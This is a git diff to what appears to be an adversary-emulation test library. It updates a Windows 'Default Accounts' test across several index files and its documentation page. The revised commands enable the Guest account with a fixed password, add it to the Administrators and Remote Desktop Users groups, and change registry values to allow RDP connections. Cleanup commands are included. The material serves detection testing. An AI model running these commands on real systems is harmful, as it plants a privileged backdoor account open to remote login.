diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index a5b35358..19864175 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -24,7 +24,7 @@ privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced fil privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt @@ -103,7 +103,7 @@ persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057f persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt @@ -239,7 +239,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell @@ -663,6 +663,6 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Al exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual -initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 679edd90..26fb4981 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -19,7 +19,7 @@ privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Lev privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt @@ -74,7 +74,7 @@ defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -defense-evasion,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell @@ -210,7 +210,7 @@ persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging S persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -persistence,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt @@ -457,6 +457,6 @@ lateral-movement,T1021.006,Windows Remote Management,3,WMIC Process Call Create, lateral-movement,T1021.006,Windows Remote Management,4,Psexec,9bab84a1-08fd-4245-b681-e62c78283002,command_prompt lateral-movement,T1021.006,Windows Remote Management,5,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,6,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell -initial-access,T1078.001,Default Accounts,1,Enable Guest account,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3d49031c..cb0e5563 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -49,7 +49,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -224,7 +224,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -501,7 +501,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] @@ -1262,7 +1262,7 @@ - T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 75fab71d..074b4d35 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -40,7 +40,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -159,7 +159,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] @@ -412,7 +412,7 @@ - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -953,7 +953,7 @@ - T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account [windows] + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9eaee27c..1258b69f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2359,20 +2359,27 @@ privilege-escalation: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1078.002: @@ -10806,20 +10813,27 @@ persistence: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1136.002: @@ -23211,20 +23225,27 @@ defense-evasion: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1578.003: @@ -52115,20 +52136,27 @@ initial-access: - SaaS identifier: T1078.001 atomic_tests: - - name: Enable Guest account + - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 description: After execution the Default Guest account will be enabled (Active) - and added to Administrators Group + and added to Administrators and Remote Desktop Users Group, and desktop will + allow multiple RDP connections supported_platforms: - windows executor: - command: | + command: |- net user guest /active:yes - net user guest Paswword123! + net user guest Password123! net localgroup administrators guest /add + net localgroup "Remote Desktop Users" guest /add + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f cleanup_command: |- net user guest /active:no net localgroup administrators guest /delete + net localgroup "Remote Desktop Users" guest /delete + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f + reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f name: command_prompt elevation_required: true T1078.002: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 9ff1ac35..2c32dc26 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -6,13 +6,13 @@ Default accounts are not limited to client machines, rather also include account ## Atomic Tests -- [Atomic Test #1 - Enable Guest account](#atomic-test-1---enable-guest-account) +- [Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-priviliges)
-## Atomic Test #1 - Enable Guest account -After execution the Default Guest account will be enabled (Active) and added to Administrators Group +## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges +After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections **Supported Platforms:** Windows @@ -24,14 +24,20 @@ After execution the Default Guest account will be enabled (Active) and added to ```cmd net user guest /active:yes -net user guest Paswword123! +net user guest Password123! net localgroup administrators guest /add +net localgroup "Remote Desktop Users" guest /add +reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f +reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ``` #### Cleanup Commands: ```cmd net user guest /active:no net localgroup administrators guest /delete +net localgroup "Remote Desktop Users" guest /delete +reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f +reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f ```